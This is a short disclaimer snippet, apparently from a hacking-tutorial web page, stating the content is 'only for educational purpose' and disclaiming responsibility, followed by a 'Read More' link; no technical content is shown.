IMPORTANT NOTE :
This is only for educational purpose we are not responsible what you do with it or what harm will be effected to other's so be patient.......... 
Read More